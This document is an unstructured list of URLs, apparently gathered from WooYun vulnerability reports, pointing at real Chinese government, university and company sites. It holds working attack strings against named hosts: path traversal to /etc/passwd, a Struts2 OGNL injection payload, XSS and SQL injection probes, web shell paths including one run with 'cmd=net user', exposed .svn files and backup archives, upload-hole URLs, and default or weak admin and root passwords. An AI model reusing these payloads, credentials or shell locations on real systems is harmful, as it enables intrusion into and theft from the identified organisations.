http://www.jsxinyi.hrss.gov.cn/hdist.do?channelid=55 http://www.jsxinyi.hrss.gov.cn/zxhf.do?id=484 http://www.jsxz.lss.gov.cn/cxpage.do?channelid=8 http://www.nckj.gov.cn/?mod=document&tpl=content&channelid=2&cateid=12&documentid=252 http://211.152.60.227:8011/API/getresv.aspx?service=get_resv_info&partner=ben4a8ysd&orderid=130512021002006 http://59.252.212.6:8080/powercms/web/Play.action http://www.flyhigh.com.cn http://service.dcloud.cn/register/articleinfo/webtoHelpArticleInfo.action http://www.189mv.cn/moviebook/reloadMovieGrade.action http://zt.baicai.com/201102/answer/61.html http://www.zhongtaitrust.com/cn/career/join_content.jsp?id=69 http://www.zhongtaitrust.com/cn/fortune/products/fortune_content.jsp?id=-1&type= http://www.zhongtaitrust.com/cn/fortune/products/info.jsp?infoid=407&type=info http://www.zhongtaitrust.com/cn/fortune/service/falv.jsp?lawid=19&type=laws http://www.zhongtaitrust.com/cn/news/news_content.jsp?id=1637&type=solution http://search.17k.com/query.do http://manager.17k.com/login.action jdbc:mysql://db.17k.com:3306/chi*****ll?useUnicode=true&characterEncoding=utf8&autoReconnect=true http://www.wefinder.com/ http://www.fengbuy.com/ http://t.cang.com/10850 http://www.cang.com/blog/ http://winning.buywit.cn/createLicense/check.php?key= http://winning.buywit.cn/createLicense/getlicense.php?key= http://product.news.sohu.com/news/tbag/ http://www.ichaier.com/downfa.php?thiks=YWFEOlx3d3dcaW5jbHVkZVxjYXQuZnVuYy5waHBiYg== http://www.ichaier.com/downfa.php?thiks=YWFpbmRleC5waHBiYg== www.ichaier.com/phpinfo.php http://service.uboxol.com/login/login http://211.151.164.47/seeyon/index.jsp http://211.151.164.78/index.php http://211.151.164.62/ http://neirong.uboxol.com/index.php http://vms.uboxol.com/ubox-vms/login.do http://124.127.89.53:8080/zentao/ http://124.127.89.57/ https://124.127.89.49/ http://124.127.89.51:8080/ http://124.127.89.53:8080/zentao/data/upload/1/ http://124.127.89.57/ http://124.127.89.57/Login.ashx?&Type=Login http://124.127.89.57/Login.ashx?Type=Load http://localhost/zz.php?a=xxx http://202.102.238.36:7002/FPApp/index.jsp http://202.102.238.36:7002/FPApp/wbxx/news/list.jsp?id=1 http://autoclaim.cpic.com.cn:8001/notice.jsp?noticetype=OUTERNOTICE http://218.246.99.199/Report.action http://guide.ecos.shopex.cn/step2.php?refer=eyJjZXJ0aV9pZCI6MTA1MSwiY2FsbGJhY2tfdXJsIjoiaHR0cDpcL1wvd3d3LmVrYWlkaWFuLmNvbVwvIn0= www.joyogame.net\/ http://oms.ahtycp.cn/login.do http://www.yunduan.cn/www.yunduan.zip http://pan.baidu.com/share/link?shareid=3205655301&uk=4164057933 http://open.hichina.com/open.zip http://pan.baidu.com/share/link?shareid=3729559197&uk=4164057933 http://www.pi-china.org/ http://www.pi-china.org/database/ http://www.jilixingdong.org/inputLogin.action?redirect:http://www.baidu.com http://www.gslib.com.cn/ http://www.gslib.com.cn/Gslibadmin/Admin_Commnet.asp http://www.kfcyouhui.com/web.rar http://www.pizzahutparty.com/web.rar http://www.dfjb.com.cn/web.rar http://youhui.dfjb.com.cn/web.rar http://youhui.yum.com.cn/ http://111.4.115.144/spjg/login.action http://tao.weiphone.com http://www.fumu.com/api/js.php?tagname=%5B2012%5D%CE%C4%D5%C2%C5%C5%D0%D0&catid=11087 http://j.esf.sina.com.cn/login/retrievepsd http://xz.ahnw.gov.cn/ http://www.cecn.gov.cn/ http://www.aqfdc.gov.cn/ http://www.rcghj.gov.cn/ http://www.hnfo.gov.cn/ http://www.hbrf.gov.cn/ http://www.liketuan.com/mycenter/myAddress.html?action=edit&id=199840 http://www.lbex.com.cn/ http://oa.lbex.com.cn/oa.rar http://www.epay360.cn http://www.epay360.cn/common/clientLogin!join.action http://beijing.pztuan.com/order/update_address.aspx?id=271180 http://data.auto.tom.com http://data.auto.tom.com/admin/brand.jsp?id=23 http://data.auto.tom.com/admin/searchForm.jsp http://data.auto.tom.com/admin/reference.jsp?id=3 http://data.auto.tom.com/admin/main.jsp?id=113 www.blzyz.org http://www.dyp2p.com/data/cache/help34.php http://sg.dzwww.com/ http://oa.gzgwbn.com.cn:8080/fckeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector http://www.hnjgdj.gov.cn/shizheng.asp?kind=%CA%B1%D5%FE%D0%C2%CE%C5&id=8220 http://cas.womaiapp.com/sso/login/?ret_url=http://118.144.75.20/user/login.action&app=cms5 http://118.144.75.16/Citrix/XenApp/auth/login.aspx http://recommend.womai.com:1107/proxy/apidocs/index.html?overview-summary.html http://photo.qq.com/cgi-bin/common/cgi_load_flash?uin=2640854696&fid=82332 http://moldsale.haier.com/admin/Default.aspx http://chinafun.com.tw/star_photo.php?artist_id=9 www.henanredcross.org/admin http://218.58.70.209:8080/ http://218.58.70.209:8080 http://admin.178.sdo.com/kindeditor/php/file_manager_json.php?path=./image/20120424/ http://admin.178.sdo.com/clear_msg.php http://admin.178.sdo.com/.svn/entries http://admin.178.sdo.com/.svn/text-base/index.php.svn-base http://admin.178.sdo.com/.svn/text-base/clear_msg.php.svn-base http://www.gyebank.com/index.html ftp://aquapower.cn/ http://www.tunka.com.cn/ http://cskb.ithaier.com/ http://cskb.ithaier.com/sysadm/thinkpad/indexpheno.jsp?id=1374284517391&parentCategoryID=1101210294169 http://travel.haier.com/travel http://travel.haier.com/travel/BaseInfo/SupplierSelect.aspx http://travel.haier.com/travel/web.zip http://218.58.70.220/海尔质量信息管理平台 http://218.58.70.220 http://client.100e.com/tool/Book/Courseware/Add/index.aspx?categoryID=2 http://img.100e.com/js/Common/地址 http://client.100e.com/tool/EnterRoom http://sso.easou.com/user/changepass http://www.wooyun.org/corps/%E5%94%AF%E5%93%81%E4%BC%9A http://wooyun.org/bugs/wooyun-2010-025239 http://125.77.198.26:9002/channelaccount/login!toLogin.do http://www.hns93.gov.cn/1.rar http://www.hns93.gov.cn/data.rar http://www.sinosig.com/festival_getBestWishes.action http://chexian.sinosig.com/carPremium/recommendAction_loadStart.action http://wecare.sinosig.com/product_productList.action?tag=1&id=1538&flag=mobile http://ec.sinosig.com/sx_show.action?COLLCC=2010671119& http://vicitim/a.html http://lottery.sports.sohu.com/readme.txt http://lottery.sports.sohu.com/esunmanage/ThinkPHP/Lib/Think/Db/Driver/pgsql.sql http://61.187.64.20:8089/ http://61.187.64.20:8000/ http://61.187.64.20:8089/teacher.asp?id=111 http://bbs.cmge.com/forum.php http://bbs.cmge.com/data/attachment/common/cf/1826109bzxrcj0pl9tgdrz.png/.php http://bbs.cmge.com/data/attachment/forum/201308/08/103904yasjau3gaaa5nnng.jpg/.php http://www.vogue.com.cn http://mall.zj189.cn/index.jsp?u=18905718888 http://3g.zj189.cn/modules/login/getps.jsp?url=http://3g.zj189.cn/torate.jsp?ad=mall http://album.appchina.com/wp-includes/ http://bbs.appchina.com/data/ http://bimg.yingyonghui.com/data/ http://plus.appchina.com/app/img?fileId=07ef8e16b6b5f16b0c09b69a52f56f1a6c433076&packageName=air.bftv.larryABCs http://despatchwbep.sf-express.com http://home.ithaier.com/wooyun.aspx http://home.ithaier.com/z7y.aspx http://home.ithaier.com/ http://home.ithaier.com/TechReportDoc.aspx?ReportCode=GFCB090316028 http://www.ahong.com.cn/phpinfo.php http://www.ahong.com.cn/phpmyadmin/ http://www.pigai.org/index.php?c=pga&a=manage&uid=108566 http://www.xj96566.com/IOC/client/login!index.action http://train.cqvip.com/ http://train.cqvip.com/search.asp?iid=123 http://cs.tktang.com/qa/Index.action www.jsqczj.gov.cn http://www.517huwai.com/photos/5199538 http://www.517huwai.com/photos/5199538 http://www.517huwai.com/photos/5199538 http://www.517huwai.com/travels/5199538 http://www.517huwai.com/album/72195 http://www.517huwai.com/Space/activity/uid/5199538 http://www.517huwai.com/blogs/5199538 http://www.517huwai.com/plans/5199538 http://www.517huwai.com/favour/5199538 http://cms2013.beareyes.com.cn/shell.php http://115.182.21.55 http://xcl.1633.com http://rc.sanya.gov.cn/person/view.php?id=655 http://rx.cmge.com/hjqstWwwAction!index http://bwzq.cmge.com/bwzqWwwAction!index http://long.cmge.com/lzsgWwwAction!index http://l.cmge.com/lzzhWwwAction.action http://fytx.cmge.com/fytxWwwAction!index.action http://xmsh.cmge.com/XmshWwwAction!index.action http://wuxia.cmge.com/wuxiaWwwAction!index User:Admin Pass:12345 http://blog.ccidnet.com/admin.php http://60.216.75.44:9081/wansinsup/login.jsp http://60.216.75.44:9081/wansinsup/shell.jsp http://maths.henu.edu.cn/data/mysql_error_trace.inc http://maths.henu.edu.cn/mathadm/login.php http://60.216.75.44:9081/wansinsup/ http://oldweb.cqvip.com/ http://oldweb.cqvip.com/zhuce/changeinfo.asp?UserName=aaa http://sxyk.henu.edu.cn/user/USERJIHUO.ASP?id=1 http://sso.agri.gov.cn/ http://sso.agri.gov.cn/admin/login.jsp http://www.wooyun.org/bugs/wooyun-2013-033288/trace/8c1d5c8c70ca3d62dcf7e4679551a265,如果方便你看可以重新审核下不。 http://pan.baidu.com/share/link?shareid=3747840041&uk=3122795587 http://download.sf-express.com/tshThSIjBouKg/XbAXCDkfoW.jsp http://kyc2.henu.edu.cn/default.aspx http://learning.haier.com/Saba/Web/Main http://learning.haier.com/jmx-console/ http://60.216.75.46:8787/taopqijian/login http://60.216.75.46:8787/taopqijian/shell.jsp http://gcztb.zhongnangroup.cn:8381/index.do http://java.sun.com/ http://www.scbuilder.com/appmain/Admin/PriUserList.aspx?SysType=3 http://www.scbuilder.com/appmain/Admin/AddUser.aspx http://www.scbuilder.com/appmain/Admin/AppIconList.aspx http://ymhm.mwr.gov.cn/toLoginPage.do http://021web.v5shop.com.cn http://021web.v5shop.com.cn/www.rar http://021web.v5shop.com.cn/weblogin/WebAdmin.aspx http://www.v5shop.com.cn/phpMyAdmin/ http://www.cqvip.com/Common/LoadPageBase.aspx?path=/web.config http://ipub.cqvip.com/Common/LoadPageBase.aspx?path=LoadPageBase.aspx http://service.v5shop.com/statistics.aspx http://service.v5shop.com/system/system.rar http://member.cpic.com.cn/ucf/register/regActiveOk?theme=new&email=邮件地址&msg=activeSuccess http://member.cpic.com.cn/ucf/register/regActiveOk?theme=new&email=smtp_admin@yeah.net&msg=activeSuccess fn:simplePassword fn:showPasswordStrong http://mas.kdlins.com.cn/file/ http://mas.kdlins.com.cn/tmp/ http://mas.kdlins.com.cn/common/viewsmsinfo/failUserList.jsp http://mas.kdlins.com.cn/common/shell/ http://dianping.chexun.com/bj/coupon_search?CommercialID=206 http://61.178.83.50:8001/login.do http://cas.womaiapp.com/sso/login/?ret_url=http://118.144.75.20/user/login.action&app=cms5 http://cas.womaiapp.com/admin/ http://www.fmi.com.cn/index.php/User/addFollow/table/Users/uid/9735 http://www.ahongmall.com/ http://v5.pc.duomi.com/single/single.shtml?id=29869663592644772 http://news.haierpeople.cn/ http://news.haierpeople.cn/cat.aspx?s=1 http://home.soufun.com/jiancai/SearchList.aspx http://www.eboss.cn/eboss_manage/index2.php?p=utf8&c=site_manage&a=insitesearch&keyword=a%27 http://www.eboss.cn/eboss_manage/index2.php?c=site_manage&a=sinawbTop&wr=103%27 http://www.eboss.cn/eboss_manage/index2.php?c=site_manage http://www.eboss.cn/changyongzixun/TOP10 http://www.3qec.com/login.jsp http://hd.eastmoney.com/vote.aspx http://www.hcxsgz.zjut.edu.cn/ShowNewsPageAction.do http://www.hcxsgz.zjut.edu.cn/shell.jsp http://t.eastmoney.com/search.aspx?kw=a% http://t.eastmoney.com/search.aspx?kw=a% http://corp.eastmoney.com/aboutus/gt_detail.aspx?id=1 http://corp.eastmoney.com/aboutus/gt_detail.aspx?id=1 http://hkba.eastmoney.com/guba_hqpost.aspx?stockcode=01186 http://support.zte.com.cn http://support.zte.com.cn//admin/ http://support.zte.com.cn/ftpdata/ http://voicechina.groups.tianya.cn/tribe/member.jsp?groupId=500974&orderby=score&orderbyDirection=desc&member= http://voicechina.groups.tianya.cn/tribe/pictureLib.jsp?groupId=500974&orderbyColumn=create_time&orderbyDirection=desc&member=&pageNo=1 http://xbjylm.groups.tianya.cn/tribe/pictureLib.jsp?groupId=423887&orderbyColumn=create_time&orderbyDirection=desc&member=&pageNo=1 http://3067.groups.tianya.cn/tribe/pictureLib.jsp?groupId=83067&orderbyColumn=create_time&orderbyDirection=desc&member=&pageNo=1 http://liumangjulebu.groups.tianya.cn/tribe/pictureLib.jsp?groupId=312&orderbyColumn=create_time&orderbyDirection=desc&member=&pageNo=1 http://groups.tianya.cn/tribe/pictureLib.jsp?groupId=142&orderbyColumn=create_time&orderbyDirection=desc&member=&pageNo=1 http://www.haierbid.com/ https://58.56.128.8/tcs https://58.56.128.8/tcs/Frm_HaierCustReg.aspx https://58.56.128.8/tcs/Frm_HaierCustReg.aspx https://58.56.128.8/tcs/Frm_HaierCustReg.aspx http://218.58.70.214/haiergc/海尔大客户项目管理系统 http://etagent.12580.com/NewPortal/loginAction.do http://zone.wooyun.org/content/5091 http://www.haiercrm.com/jxc/index.jsp http://www.haiercrm.com/acceptcatdata/login.jsp http://www.haiercrm.com/ipos/login/login.htm http://www.haiercrm.com/rrs/login.jsp http://www.haiercrm.com/jxc/mobileuser/queryfrommfid.jsp?PageIndex=1&search1=&search2=&search3=12C01&name1=SAP_FROMMFID&name2=SAP_FROMMFNAME&mktid= http://www.haiercrm.com/jxc/mobileuser/queryfrommfid.jsp?mktid= http://www.haiercrm.com/jxc/mobileuser/queryfrommfid.jsp?name1=SAP_FROMMFID&name2=SAP_FROMMFNAME&search3=12C01 http://mm.56.com/ http://www.cqda.gov.cn/a.zip http://59.48.152.133:8080帐号admin密码123456.弱口令啊有木有 http://wpfree.yesky.com/plus/mytag_js.php?aid=9090 http://www.3366.com/flash/1000168.shtml http://www.itophome.com/海尔e家联盟 http://marketing.haieruhome.com/海尔终端执行力系统 http://marketing.haieruhome.com/wooyun.txt http://www.itophome.com/uploadfiles/1.aspx http://www.itophome.com/uploadfiles/ht.aspx http://www.itophome.com存在fck编辑器上传漏洞。 http://www.itophome.com/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Flash http://sync.coral.qq.com/t/1000269489?source=1&callback=1014xxx%3Csvg/onload=alert%28document.cookie%29%3E&_=1376185737425 http://211.90.10.114 http://evs.haier.net/easp/uiloader/login.html海尔电子核销系统 http://evs.haier.net/easp/uiloader/$/ssb/uiloader/ssoLoginMgt/login.ssm http://evs.haier.net/easp/uiloader/login.html http://211.90.10.225:8080 http://login.2345.com/find.php?type=password http://219.239.97.42/ http://219.239.97.42/ScriptResource.axd?d=yGw8u5dqy7H3e40ExMqJYFttlP5WFyaiqezeZ9yBfvoAAAAAAAAAAAAAAAAAAAAA0 http://wooyun.org/bugs/wooyun-2013-034101 http://dyp2p.com/?code&p=add&q=invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././ http://newadmin.newman.mobi/default.php?m=default&c=service&cat_id=82&atr_id=84 http://www.newman.mobi/default.php?m=default&c=service&cat_id=82 http://libao.game.pps.tv/lbcenter/getgift/index?g_id=352 http://libao.game.pps.tv/lbcenter/getgift/index?g_id=352%3CH2%3Ewahaha%3C/H2%3E http://c.etuan.com/ root:root123 root:654321 root:123456 root:root http://123.234.41.202:8390 http://123.234.41.202:8390/login.action http://123.234.41.202:8390/shell.jsp http://register.ccidnet.com/comment/disp/topic_comment?topicID=46690#comment http://cn.bing.com/search?q=ip%3A123.183.218.107&qs=n&form=QBLH&pq=ip%3A123.183.218.107&sc=0-2&sp=-1&sk= arts.lib.tsinghua.edu.cn/data/mysql_error_trace.inc爆信息 http://www.kdlins.com.cn/poispLogon!findPassword.action?userId= http://202.102.111.101/login_login.action http://subscribe.ellechina.com/ http://subscribe.ellechina.com/w/x.asp http://sae.sina.com.cn/)页面上方的登录按钮时,会转到新浪微博的“应用授权”页面。由于用户登录后可以直接修改SAE平台上应用的重要信息,所以在这里SAE平台使用了强制登录功能,即“应用授权”页面不会自动读取当前用户的登录信息(如果有),而是强制要求用户输入帐号和密码。 https://api.weibo.com/oauth2/authorize?client_id=2857799177&redirect_uri=http%3A%2F%2Fsae.sina.com.cn%2Fssl%2F%3Fm%3Dsso%26a%3Dweibo_callback%26sccb%3Dhttp%253A%252F%252Fsae.sina.com.cn%252F&response_type=code&forcelogin=true,位于最后的“forcelogin=true”就是用来控制“强制登录”功能,删除这个代码再按回车,应用授权就会直接直接读取用户登录信息并通过授权(如果该电脑已经成功的登陆过微博并选择了“下次自动登录”,而很多用户都会勾选) http://www.hlj.stats.gov.cn/1.rar http://www.hnxmy.gov.cn/www.hnxmy.gov.cn.rar http://bjjnds2011.ccidnet.com/fckeditor/ http://bjjnds2011.ccidnet.com/data/ http://bjjnds2011.ccidnet.com/include/ http://bjjnds2011.ccidnet.com/data/servise.php http://bjjnds2011.ccidnet.com/data/1af339d2d06317bb0a797e31d882d025_safe.txt http://passport.soufun.com/othercallback.aspx?sinaid=45410 http://passport.soufun.com/othercallback.aspx?sinaid=45409 http://passport.soufun.com/othercallback.aspx?sinaid=45408 http://www.hnfgw.gov.cn/web.rar http://116.228.55.5/114Ad/introduce.aspx http://116.228.55.5/114Ad/articledetail.aspx?id=315 http://w.fjwest.com/wpzj/Main/main.jsp https://mp.weixin.qq.com/cgi-bin/advanced?sub=index&t=advanced/index&token=【这里改成自己的Token】&lang=zh_CN http://xx.oo/tztsms4/index.php http://xx.oo/tztsms4/censor/qtgs_all.php http://xx.oo/tztsms4/censor/qtgs_all.php?page=数字 http://tangyuan.tom.com/admin/user_passport.php www.elline.cn同样存在相同漏洞 http://www.tijian.org/shownews.asp?id=179 http://www.tijian.org/admin/login.asp http://admin.dj.dou.91.com/?do=Login http://www.ddmap.com/ http://wpfree.yesky.com/plus/downpic.php?id=396 http://goldpen.ccidnet.com/goldpen/ http://www.tprtc.com)有几大类模块包括“企业国有产权挂牌项目”、“企业产权挂牌项目”、“涉诉资产交易平台”等版块,点其中一个模块的链接,会跳转至另外一个项目,如我点击编号为1201CSW20130801002 http://xinxipingtai.tprtc.com:8080/transaction/D_table/swjy.jsp?no=1201CSW20130801002,通过分析这是交易平台一个子项目,监听端口为0080,初步怀疑是用Tomcat容器,重新打开一个浏览器,输入http://xinxipingtai.tprtc.com:8080回车,熟悉的界面出现在面前 http://xinxipingtai.tprtc.com回车,出现子项目的界面,点击“产权转让项目信息”,内容如图所示 http://uap.91.com/user?username=admin0242 http://uap.91.com/user?username=admin0242%27%23 http://wooyun.org/bugs/wooyun-2010-06672 www.ycxl.net http://www.***.com/admin/upfile.asp?folder=../upload&insert=wj www.e-chinalife.com http://www.e-chinalife.com http://117.79.80.23:8000/robots.txt http://117.79.80.23:8000/info.php http://www.xinnet.com/xinnetol.war http://nc.womaiapp.com/login.jsp android:name="com.baidu.android.defense.push.PushMsgReceiver android:process=":bdservice_v1 android:name="com.baidu.android.pushservice.action.RECEIVE android:name="com.baidu.android.pushservice.action.MESSAGE http://www.joinwish.com/wish/show/id/12074 http://gd.91.com intitle:topsec www.landks.com www.zjhnztb.com www.haas.org.cn http://www.jstzrcb.com/artshow.action http://www.sndrc.gov.cn/ldxx/fwb5.jsp?LID=321 http://v.baidu.com/v?word=x&ct=301989888&rn=20&pn=0&db=0&s=0&fbl=800#%22%3E%3C/script%3E%3Ciframe/onload=alert%281%29%3E&qq-pf-to=pcqq.c2c http://www.yozosoft.com/gywm/newsInfo!select.do http://pan.baidu.com/share/link?shareid=2907637738&uk=2368521055 URL:http://weixin3.gg.pp.cc/wap/product/info.html?store_id=0&id=9217 http://mobile.womai.com/wmapi/login http://gg.pp.cc/prize.html?platform=qzone&nick=1&appid=65 http://gss.hisense.com:6699/ http://www.dfyb.com.cn/InfoPublish/newscenter_detail.asp?news_id=2080 http://www.dfyb.com/InfoPublish/newscenter_detail.asp?news_id=2022 http://www.dfyb.com/InfoPublish/newscenter_detail.asp?news_id=1309 http://www.dfyb.com/newcenter/newscenter_detail.asp?news_id=173 http://gg.pp.cc/waibao/hl/active.php?uid=1&year=2013&month=5&date=14 http://www.youc.com/ http://www.esafenet.com/data/admin/ver.txt http://www.dflpj.cn/main/ http://www.dflpj.cn/temp/ http://www.dfyb.com.cn/inc/ http://www.dfackc.net/database.rar http://baike.baidu.com/view/25660.htm http://www.dfackc.com/database.rar http://www.dfackc.net/database.rar http://www.dfaclxc.com/database.rar http://www.dfaclxc.net/database.rar http://www.dfxch.net/database.rar http://www.dfxylxc.com/database.rar http://www.dfxylxc.net/database.rar http://stockdata.stock.hexun.com/jgcc/industryrank.aspx?id=1 http://202.119.47.40:8080/sq/add.asp?ssnum=111 http://anquan.baidu.com/bbs/ http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003e/1.swf[/flash http://222.46.21.60:8080/,看了一下,存在struts2 http://id.kingdee.com/password/forgot.action http://brand.wljhealth.com/public/detail.php?id=8 http://teleinfo.catr.cn/Default.aspx http://teleinfo.catr.cn/ScriptResource.axd?d=yPQPLHHoKBhJOfSvyKfWvwWjo8xAmmkc62A8r4zelAEAAAAAAAAAAAAAAAAAAAAA0 http://www.panjk.com/RSSpanjk.aspx?rsstype=1 http://ui.letv.com注册一个然后发帖 http://ta.qidong.gov.cn/proposal/index.jsp http://home.xdf.cn/ http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003e/1.swf[/flash http://www.bankcomm-microfilm.com/laoyouba/manage/list.php http://www.bankcomm-microfilm.com/laoyouba/manage/test.php http://cinema.youku.com/philips/images/.svn/entries http://ilovee-surfing.youku.com/css/.svn/entries http://rej.youku.com/.svn/entries http://ninjiom.youku.com/index.php?per=1&s=%22%20onmouseover%3dalert%28%2fxss%2f%29%20bad%3d%22 http://pino.youku.com/crossdomain.xml http://bbs.ngl.tnyoo.com/forum.php http://202.197.191.232/markbook/GetIndex.jsp http://202.197.191.232/markbook/GetIndex.jsp?UName=test http://qz.jianghu.taobao.com/trade/trade_coin.htm?order_id=[orderid http://xx~/wcm/services,web http://bbs.mumayi.com/forum.php?mod=post&action=newthread&fid=128 http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003e/1.swf http://sq.xywy.com/uc/reg/regfinish.php?reguid=20234441 http://tj.xywy.com/interface/demon.php?id=1&num=7 http://www.dfyb.com/newcenter/Admin_Login.asp http://www.dfyb.com/Inc/ http://www.dfyb.com/flash/ http://www.dfyb.com/Board/ http://www.dfyb.com/newcenter http://www.dfyb.com/index/ http://www.dfyb.com/ad/ http://www.dfyb.com/sales/ http://www.dfyb.com/samples/ http://www.dfyb.com/_notes/ http://www.dfyb.com/_vti_pvt/ http://www.dflpj.cn/aspnet_client/ http://www.dflpj.cn/images/ http://www.dflpj.cn/scripts/ http://www.dflpj.cn/temp/ http://www.dflpj.cn/image/ http://www.dflpj.cn/main/ http://www.dflpj.cn/report/ http://www.dflpj.cn/download.aspx http://www.dflpj.cn/main/MainA08.aspx http://www.dflpj.cn/main/menu3.asp http://219.139.20.19/setup.asp?action=setup http://219.139.20.19/find/findfwz.asp http://219.139.20.19/top.asp http://219.139.20.19/uploadPic.asp http://www.12320.gov.cn/news/show.jsp?id=6262 http://www.12320.gov.cn/manage/download.jsp?filepath=fujian/../../../../../../etc/passwd www.12320.gov.cn/manage/download.jsp?filepath=fujian/../manage/login.jsp http://111.13.100.72:8080/ http://shang.hlgnet.com/gotogg.php?id=298 http://shang.hlgnet.com/gotogg.php?id=298 http://rds.blog.alibaba-inc.com/?author=1 http://rds.blog.alibaba-inc.com/?author=16 http://www.svnchina.com/svn/gxy http://606wan.com/等多个网站源码以及数据库 http://zhushou.360.cn/flash/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28/xss/%29}}// http://yanbao.stock.hexun.com/handle/Iframe_dzgg.aspx?code=600050 http://www.qfkd.com.cn/zxkf/Admin/SYSTEM/adminLogin.aspx http://www.qfkd.com.cn/zxkf/powertalk/im/chat.aspx http://119.253.56.22/Cancle.action http://119.253.56.22/Silic.jsp http://www.yooli.com/detailmessage.session.action?mid=201 http://222.82.232.227:9991/bscx!bjgs.action http://222.82.232.227:9991/Silic.jsp http://222.82.232.227:9991/qwe11111111.jsp?cmd=net+user http://www.4.cn http://www.gxgp.gov.cn:9000/egps/Silic.jsp http://www.gxgp.gov.cn:9000/egps/userlogin_login.action user:admin pass:12345 http://msg.mail.163.com/cgi/mc?funcid=getusrnewmsgcnt&template=newmsgres_setcookie.htm&callback=getNewMail&fid=1&username=XXXXXX@163.com&_=1376378237812 http://to.taobao.com/OJweqgy?spm=a1z02.1.1000293.5.H2IB7K&_g=a12005723&_tg=15&_f=feedBody&_t=15&_n=1768368836&_tk=6650336752 http://ttaobxxc.com/sdfsdf?id=123s5d4f5f4x45345345 http://955.cc/kbNA http://www.360sky.com/download/gameonline.jsp?classid=19&fileid=463 http://speedtest.zj.chinaunicom.com/netinfo.jsp?infoType=kdzs http://qm.zj165.com/sign/news.do?method=showNewsAffiche&newid=EBBF898657D84D30AD5CD6168B027EBE http://xxx.xxx.xxx:xxx/device_set_manage.asp?userlogin.asp页面能够备份系统设置信息 http://221.235.153.152/upimg/info/1css.jsp http://cos.sanguosha.com/admin/index.php http://smart.szpay.net/IndexAction_logout.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://202.136.60.183/admin/login.aspx http://cmb.zbird.com/index.php?m=module_zb2_article.ui_article_portal.view&a_id=65DF504D817CC5CC5AC11B5A9FC6610D http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003e/1.swf[/flash http://bbs.radio.wanmei.com/ http://bbs.kdxy.wanmei.com/forum.php http://bbs.world2.wanmei.com/index.php http://bbs.zhuxian.wanmei.com/forum.php http://bbs.w2i.wanmei.com/forum.php http://bbs.xlzj.wanmei.com/ http://bbs.sgcq.wanmei.com/ http://bbs.yt.wanmei.com/forum.php http://bbs.xa.wanmei.com/ http://bbs.rwpd.wanmei.com http://g.candou.com http://www.nbkjt.com/portalPage/feedback!ToAdd.action http://www.nbkjt.com/404.jsp http://bbs.cwan.com/home.php?mod=spacecp&id=../../robots.txt%0057 http://lcx.cc/?i=3524 ftp://hdwj.gov.cn/www/ ftp://hdwj.gov.cn/www/ http://wooyun.org/bugs/wooyun-2013-029023,顺手测了一下 http://203.91.45.154/ http://203.91.45.154/templates/integrationnet/integrationnetPage.action http://203.91.45.154/Silic.jsp http://203.91.45.154/openope.jsp ftp://www.hubeiqiye.com/ http://corp.metersbonwe.com/shownewsCorp.php?id=88 http://corp.metersbonwe.com/shownewsCorp.php?id=88 http://corp.metersbonwe.com/shownewsCorp.php?id=88 http://corp.metersbonwe.com/shownewsCorp.php?id=88 http://corp.metersbonwe.com/shownewsCorp.php?id=88 